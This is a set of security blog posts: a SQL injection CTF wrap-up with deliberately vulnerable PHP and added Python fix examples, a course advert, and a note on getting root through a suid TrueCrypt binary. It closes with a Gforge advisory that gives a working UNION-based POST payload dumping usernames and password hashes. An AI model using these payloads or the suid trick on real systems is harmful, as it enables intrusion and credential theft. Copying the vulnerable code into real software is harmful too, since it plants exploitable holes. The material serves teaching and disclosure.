
SqliLab CTF, Wrap Up!


As you would have noticed from the noise on Twitter and other channels, the 2nd public CTF was a major success. Over 3000 registrations, ~7K unique IPs, 7 GB of logs (in 3 days) and heaps of fun. As with anything, we had some unwanted visitors, who tried to take the CTF down with a DNS amplification DDoS attack. The site's performance was affected, but nevertheless the CTF stayed active and we provided some extra time to make up for the downtime.

So, just to wrap up: the CTF had 2 objectives. Those who obtained both flags ended up on the leaderboard. We will wait for the winners to publish their individual write-ups. In the meantime, here is a sneak peek at the code/vulnerabilities.

Both flags were based on existing challenges in our SQLi Lab. SQLi Lab is an awesome place to learn and master SQL injection: 4 databases, 27 challenges, 90 objectives and heaps of fun!

Okay, with the marketing done, let's dive into the CTF. The 2 vulnerabilities on which the CTF was based were:

1. Column Truncation
2. Double decode SQL Injection

The 2nd flag was particularly tricky to get and most people had difficulty getting it.


Here is some code from the application:

$comments = mysql_real_escape_string($_POST['message']);
$url = mysql_real_escape_string($_SERVER['HTTP_REFERER']);   // escaped first...
$query = "Insert into temp values('".$comments."','".urldecode($url)."')";   // ...then URL-decoded, after the escaping

The trick here is to identify the following:

1. The attack surface is not just the HTTP parameters but also other headers (e.g. Referer).
2. The application urldecodes the header value after validation.

Thus, %27 (') gets escaped by mysql_real_escape_string(), whereas %2527 doesn't get escaped and urldecode() converts it to %27, which triggers the vulnerability. It's actually common for apps to perform a URL decode on data coming from fields such as Referer. Both vulnerabilities have affected popular applications like WordPress, and we have found these vulnerabilities in custom applications during our pentests.
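The ordering bug above, as an added example that is not part of the CTF's own code: it models the "double decode" pipeline the post describes (the Referer value is assumed to be URL-decoded once before the snippet, then escaped, then urldecode()d again by the application), shows the order that keeps the escaping intact, and adds a canonicalisation check that rejects still-encoded input. mysql_escape() is a simplified stand-in for PHP's mysql_real_escape_string().

```python
# Added example (not the CTF's own code). Models the "double decode" pipeline
# the post describes: the Referer value is URL-decoded once before the snippet
# (assumed, e.g. by a front end), escaped, then urldecode()d again by the app.
# mysql_escape() is a simplified stand-in for PHP's mysql_real_escape_string().
from urllib.parse import unquote

def mysql_escape(s: str) -> str:
    """Backslash-escape the characters mysql_real_escape_string() escapes."""
    table = {"\\": "\\\\", "'": "\\'", '"': '\\"', "\x00": "\\0",
             "\n": "\\n", "\r": "\\r", "\x1a": "\\Z"}
    return "".join(table.get(c, c) for c in s)

def urldecode(s: str) -> str:
    """PHP urldecode(): '+' becomes a space, %XX sequences are decoded once."""
    return unquote(s.replace("+", " "))

def has_unescaped_quote(value: str) -> bool:
    """True if a single quote in the SQL string literal is not backslash-escaped."""
    escaped = False
    for c in value:
        if escaped:
            escaped = False
        elif c == "\\":
            escaped = True
        elif c == "'":
            return True
    return False

def value_vulnerable(raw_referer: str) -> str:
    """The CTF's order: (first decode) -> escape -> urldecode.  Decoding after
    escaping can reintroduce a quote that the escape never saw."""
    once = urldecode(raw_referer)            # assumed front-end decode
    return urldecode(mysql_escape(once))     # what the snippet puts into SQL

def value_fixed(raw_referer: str) -> str:
    """Canonicalise fully first, then escape the bytes that reach the query.
    (Bound parameters remain the real fix; escaping is kept to match the post.)"""
    once = urldecode(raw_referer)
    return mysql_escape(urldecode(once))

def is_canonical(s: str) -> bool:
    """Defensive check: reject input that still changes on a further decode,
    i.e. double-encoded data such as %2527.  A legitimate '%2520' inside a
    referer is rejected too; that is the trade-off of this rule."""
    once = urldecode(s)
    return urldecode(once) == once
```

With the raw Referer `http://x/?q=%2527`, value_vulnerable() yields an unescaped quote while value_fixed() does not, and is_canonical() rejects the input outright.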

We didn't want people to run benchmark() and sleep() against the database, so we decided to blacklist them:

$patterns = array('sleep', 'benchmark');
$patterns_flattened = implode('|', $patterns);
// case-insensitive match against the decoded header value
if (preg_match('/'.$patterns_flattened.'/i', urldecode($url))) {
    echo 'Attack detected';
    die;
}

This made identifying the vulnerability a bit difficult. But the fact that the blacklisted functions produced a visible "Attack detected" response gave participants a clue that this header could potentially be vulnerable. Further, you get feedback from the application depending on whether the SQL query returned an error or not:

$result = mysqli_query($dbConnection, $query);

if ($result) {
    echo "Thanks!, we will be in touch...";
} else {
    echo "Error Occured :(";
}

We will leave the CTF link live for another few days for people to have a go at it. We are not accepting any submissions now. Thanks all for playing!

Finally, if you are interested in the topic of Injection Flaws, you can register for our class at Black Hat Las Vegas 2014.

A full write-up on the CTF can be found here

The Art of Exploiting Injection Flaws @ Black Hat Vegas 2013

Hello All,

The popular course on Injection Flaws will return to Las Vegas at Black Hat 2013. The 2-day hands-on course covers injection flaws and ONLY injection flaws. We don't talk about XSS, CSRF, CRLF etc. I think 2 days is not enough time to learn the whole of web application security, and thus I focus only on injection flaws.

I will be appearing on the famous podcast pauldotcom and giving a little insight into the course on April 25th, 7PM ET.

A little write-up about this can be found here:

In short, the USPs of the course are:

Advanced/Insane SQLI
Examples where SQLi goes undetected by commercial tools
Advanced XPATH Injection (including 2.0)
Advanced LDAP Injection
Advanced HQLI/ORM Injection
Advanced XXE Injection, including blind XXE

The course page can be found here

See you in Vegas!


Update: here is the video from my podcast at pauldotcom:

Update: My interview at Dark Reading, which also gives an insight into the course, can be found here

TrueCrypt running as sudo

Recently, I was going through the following TrueCrypt page:
http://en.gentoo-wiki.com/wiki/TrueCrypt

What is interesting to note is the recommendation to add a 'truecrypt' group to the sudo commands. As truecrypt needs to be run as root, I assume that people will be making this binary suid root too.

To me this does not look very secure. Unlike an NFS share, which is by default mounted with root squashing enabled, TrueCrypt volumes have no such protection. Thus, if a box has the truecrypt binary set suid, one just needs to transfer an encrypted volume (containing a suid bash binary) onto this box, mount the volume and execute that suid binary. This gives a root shell.

Thus it is important that truecrypt is not run as suid. This may already be known to some, but hey, I found it interesting. :)
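The mitigation this note points at is the one NFS gets from root squashing: a volume that users can bring onto the box should be mounted with nosuid (and nodev), so a setuid binary inside it runs without elevated privileges. An added check, not from the post, that reads /proc/mounts format and reports user-volume mount points lacking those options; the sample mount table and the /mnt, /media prefixes are constructed assumptions.

```python
# Added example (not from the post). Reports mounted volumes under user
# mount prefixes that lack the nosuid/nodev options which stop a setuid
# binary inside a user-supplied volume from running with root privileges.
# Input is in /proc/mounts format; SAMPLE_MOUNTS below is constructed.
from typing import Iterator

SAMPLE_MOUNTS = """\
/dev/sda1 / ext4 rw,relatime 0 0
/dev/mapper/truecrypt1 /mnt/tc ext3 rw,relatime 0 0
/dev/mapper/truecrypt2 /mnt/tc_safe ext3 rw,nosuid,nodev,relatime 0 0
/dev/sdb1 /media/usb vfat rw,nosuid,nodev,noexec,relatime 0 0
"""

USER_MOUNT_PREFIXES = ("/mnt/", "/media/")   # assumption: where volumes land
REQUIRED_OPTS = {"nosuid", "nodev"}

def parse_mounts(text: str) -> Iterator[tuple[str, set[str]]]:
    """Yield (mount point, set of options) per /proc/mounts line.
    /proc/mounts escapes spaces in paths as \\040; those are unescaped here."""
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 4:
            continue                      # malformed or empty line
        mount_point = fields[1].replace("\\040", " ")
        yield mount_point, set(fields[3].split(","))

def mounts_missing_nosuid(text: str,
                          prefixes: tuple[str, ...] = USER_MOUNT_PREFIXES) -> list[str]:
    """Mount points under the given prefixes whose options lack nosuid or nodev."""
    return sorted(mp for mp, opts in parse_mounts(text)
                  if mp.startswith(prefixes) and not REQUIRED_OPTS <= opts)

if __name__ == "__main__":
    # On a live Linux box: python3 this_script.py  (reads the real mount table)
    with open("/proc/mounts", encoding="utf-8") as fh:
        for mp in mounts_missing_nosuid(fh.read()):
            print(f"{mp}: mounted without nosuid/nodev")
```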

New Theme

NotSoSecure became slightly more secure with the new WordPress update.
This update is highly recommended if your WordPress allows user registration.
It's amazing how many vulnerabilities have been identified in WordPress over the years, and I wonder how many are yet to come.

Gforge SQL Injection

Original Advisory: http://www.portcullis-security.com/179.php

The file /www/people/editprofile.php seems to be vulnerable to SQL injection at multiple points.

The exploit is fairly easy: one POST request returns all the usernames and hashes from the backend database.

The hashes can then be cracked using John the Ripper.

Exploit:

POST request to /www/people/editprofile.php with the body:

skill_delete%5B%5D=484)+UNION+ALL+SELECT+user_name||unix_pw+from+users--%3d1&MultiDelete=Delete

This works against a PostgreSQL database :).

Refer to the paper for exploiting SQL injection against PostgreSQL databases.